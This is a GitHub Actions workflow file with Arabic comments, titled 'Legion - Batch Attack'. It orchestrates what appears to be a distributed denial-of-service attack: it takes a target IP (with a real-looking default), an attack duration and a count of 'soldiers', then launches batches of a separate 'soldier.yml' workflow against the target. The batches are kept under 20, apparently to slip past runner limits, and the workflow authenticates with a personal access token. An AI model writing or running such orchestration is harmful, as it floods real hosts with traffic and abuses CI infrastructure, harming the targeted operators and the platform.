# اسم الـ Workflow: Legion - Batch Attack Strategy (v9 - Token as Input)
name: Legion - Batch Attack (v9)

on:
  workflow_dispatch:
    inputs:
      target_ip:
        description: 'عنوان IP الهدف'
        required: true
        default: '63.246.154.12'
      duration_per_batch:
        description: 'مدة الهجوم لكل دفعة (بالثواني)'
        required: true
        default: '300'
      total_soldiers:
        description: 'إجمالي عدد الجنود المراد إطلاقه'
        required: true
        default: '150'
      batch_size:
        description: 'حجم الدفعة الواحدة (يجب أن يكون أقل من 20)'
        required: true
        default: '19'
      # --- الإضافة الجديدة هنا ---
      pat:
        description: 'Your Personal Access Token (PAT)'
        required: true

jobs:
  calculate_batches:
    runs-on: ubuntu-latest
    outputs:
      batch_matrix: ${{ steps.generate-matrix.outputs.matrix }}
    steps:
      - name: Calculate number of batches
        id: generate-matrix
        run: |
          TOTAL=${{ github.event.inputs.total_soldiers }}
          SIZE=${{ github.event.inputs.batch_size }}
          NUM_BATCHES=$(( (TOTAL + SIZE - 1) / SIZE ))
          MATRIX="{\"include\":["
          for (( i=0; i<$NUM_BATCHES; i++ )); do
            MATRIX+="{\"batch_number\":$i},"
          done
          MATRIX=$(echo $MATRIX | sed 's/,$//')
          MATRIX+="]}"
          echo "matrix=$MATRIX" >> $GITHUB_OUTPUT

  legion_commander:
    needs: calculate_batches
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix: ${{ fromJson(needs.calculate_batches.outputs.batch_matrix) }}
    steps:
      - name: Announce and Dispatch Batch
        run: |
          BATCH_NUM=$(( ${{ matrix.batch_number }} + 1 ))
          echo "===== بدء الدفعة رقم: $BATCH_NUM ====="
        
      # --- التعديل هنا: استخدام التوكن من المدخلات ---
      - name: Dispatch Soldier Batch
        uses: benc-uk/workflow-dispatch@v1
        with:
          workflow: soldier.yml
          # استخدام التوكن الذي تم إدخاله يدويًا عند التشغيل
          token: ${{ github.event.inputs.pat }}
          inputs: >
            {
              "target_ip": "${{ github.event.inputs.target_ip }}",
              "duration": "${{ github.event.inputs.duration_per_batch }}",
              "swarm_size": "${{ github.event.inputs.batch_size }}"
            }
